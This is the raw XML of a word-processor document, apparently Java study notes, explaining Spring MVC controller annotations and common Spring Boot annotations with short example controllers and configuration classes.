    <w:p w14:paraId="0FFFEE1F"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GetMapping("/search")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685ECB70"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String search(@RequestParam String query) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AF8006"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Searching for " + query;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CF3514"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2234245F"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athVariable</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To extract variables from the URL path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45641DC3"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD6A618"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GetMapping("/user/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AEC1E8"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String getUserById(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6851BD4B"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User with id " + id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D7C22F"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4A415A0B"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equestBody</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To bind the body of the request to a method parameter (usually for POST, PUT, or PATCH requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48283116"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EFF1B5"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ostMapping("/addUser")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381888FE"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String addUser(@RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204C42C1"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Logic to add the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A9AEB8"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User added";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A0A310"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7D9C4499"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esponseBody</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to send the response body directly (e.g., returning JSON data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F008CBA"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0323B230"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GetMapping("/user/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B777D3C"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sponseBody</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020C1735"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User getUser(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E2FD66"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new User(id, "John Doe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332002A2"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6E11DCDC"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ModelAttribute</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to bind a method parameter or a method return value to a named model attribute, which will then be available for the view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E52E639"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D56EDC1"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ModelAttribute("user")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEBBECF"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User user() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2103DFCC"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new User();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAD4B5C"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0F30CF62" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E90969A"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GetMapping("/form")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEE6E08"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String showForm() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35000BD0"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userForm";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD1FB69"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5BA6C49C"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equestHeader</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To extract specific HTTP request headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D169DE"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D73148"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GetMapping("/headerInfo")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058A6383"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String getHeaderInfo(@RequestHeader("User-Agent") String userAgent) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29184F97"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User-Agent: " + userAgent;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B213C5" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="0055404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5EAD4415" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048"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Return Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3819B977"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String</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the return type is a string, it typically refers to the name of the view to be rendered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DECC9EB"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ModelAndView</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can return ModelAndView to specify the view and model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100B2559"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Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For REST APIs, returning an object will automatically be serialized to JSON or XML based on the content type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A48D2B" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048"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 of Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C86930"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4078239D"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UserController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFB1B52" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B53F819"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GetMapping("/user/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F61B2B7"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    public User getUser(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12121C4E"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Logic to fetch user by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD49FB2"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new User(id, "John Doe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FF54D2"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0C65B803" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3550F5A6"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ostMapping("/user")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DECC1BC"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String createUser(@RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED140BB"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Logic to create user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAD3474"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User created: " + user.getName();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC21CFB"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40DEB707" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B206C52"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tMapping("/user/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E86B64"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String updateUser(@PathVariable Long id, @RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206CC0DC"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Logic to update user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072F701F"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User updated: " + user.getName();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ED1194"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3EC83D12" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22DBC15E"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DeleteMapping("/user/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63960737"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String deleteUser(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9FC18B"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Logic to delete user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D0AEF0"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User deleted with id: " + id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D404EE"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24CDECD7"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0B03A76F" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="00554048"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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263B1110" w14:textId="77777777" w:rsidR="00554048" w:rsidRPr="00D774B4" w:rsidRDefault="0055404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n Spring MVC, controller methods are responsible for handling HTTP requests. These methods can be annotated with various annotations like @GetMapping, @PostMapping, @PutMapping, @DeleteMapping, etc., to map specific HTTP request methods to handler functions. Additional annotations like @RequestParam, @RequestBody, and @PathVariable allow extracting request parameters or body content to be used in the controller methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285DF4B8" w14:textId="350D6885"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837F061">
          <v:rect id="_x0000_i2517" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39387F14" w14:textId="3E39294C" w:rsidR="00B66E7F" w:rsidRPr="00CE4B95" w:rsidRDefault="004976B6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="581" w:name="_Toc196308061"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain annotations in Spring boot</w:t>
      </w:r>
      <w:r w:rsidR="00B66E7F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="581"/>
    </w:p>
    <w:p w14:paraId="423DF925" w14:textId="4DEF57C6" w:rsidR="00C867C4" w:rsidRPr="00D774B4" w:rsidRDefault="00C867C4"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n Spring Boot, annotations play a crucial role in simplifying configuration and enabling various functionalities for application development. Below is a detailed explanation of the commonly used annotations in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8BCE5E"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1. @SpringBootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3478C264"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is the main annotation used to mark a class as a Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C652CB"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Features</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It combines @Configuration, @EnableAutoConfiguration, and @ComponentScan annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E62EEC5"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Typically placed on the main class to enable Spring Boot's auto-configuration and component scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246EB7D0"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pringBootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468E5B89"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MyApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5A80B7"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5108E68A"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SpringApplication.run(MyApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8111D9"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3B96AA3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1E0DE265"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2. @Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B2F650"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Marks the class as a source of bean definitions for the application context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA028B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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is used to define beans using methods annotated with @Bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5445C8AB"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nfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14303512"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AppConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1870AB10"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355F4F24"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MyService myService() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246BF91D"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new MyServiceImpl();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4089A0"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0FECB2E4"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0697A0A9"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3. @ComponentScan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FB1FFB"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tells Spring to scan the specified package for components, configurations, and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A069696"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lastRenderedPageBreak/>
        <w:t>Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is usually used with @SpringBootApplication to automatically detect components within the application’s package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CBA707"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mponentScan(basePackages = "com.example")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D37A4D"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pringBootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2007D61C"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MyApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ADA67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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD9241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SpringApplication.run(MyApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2449500F"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2B91058D"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758EAB3D"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4. @RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4C4C20"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to define a RESTful web service controller. It is a combination of @Controller and @ResponseBody.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7311695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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This annotation is used to mark a class as a controller that handles HTTP requests and automatically converts return values into JSON or XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E027F2C"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D5BC16"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MyController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629D70A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GetMapping("/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF6CC1F"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String sayHello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33018FDD"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Hello, World!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF8D984"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2EBD7AB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361894B2"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5. @RequestMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680D339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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Maps HTTP requests to handler methods of MVC and REST controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D80701B"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Can be used with various HTTP methods (GET, POST, PUT, DELETE, etc.), or as a generic mapping to all request types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2359B69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questMapping("/api")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BF9A1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String getApi() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28869A1A"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API Response";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED2B10F"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03DF6F95"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You can use @GetMapping, @PostMapping, etc., as more specific alternatives to @RequestMapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC86685"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6. @GetMapping, @PostMapping, @PutMapping, @DeleteMapping, @PatchMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C11C96A"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Shorthand annotations for HTTP GET, POST, PUT, DELETE, and PATCH requests respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5168E430"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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These annotations are more specific versions of @RequestMapping for specific HTTP methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4006E8D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GetMapping("/users")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642067E9"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List&lt;User&gt; getUsers() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3F38A0"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userService.getAllUsers();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766C29F0"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2E91D7E5"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7. @Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1441D6"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used for automatic dependency injection. Spring will automatically inject the correct bean based on the type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202E79D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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can use it on fields, constructors, or setters to inject dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32044747"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692F4E66"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rivate UserService userService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DF9690"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8. @Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA007A6"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to inject values into Spring beans from property files (application.properties or application.yml).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4852566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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Often used to inject values such as strings, numbers, or configurations from the application’s configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C8905F"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Value("${app.name}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E574AC7"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rivate String appName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DC8BF6"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9. @Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F223C6"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urpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines a bean in a @Configuration class. This is used to explicitly declare a bean within the Spring application context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5340B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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you want to define a custom bean or a third-party class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E77C6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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9BA0C2"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MyService myService() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C72EE32"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new MyServiceImpl();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2028C517"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571DBD6C"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10. @Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF8CFAC"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lastRenderedPageBreak/>
        <w:t>Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
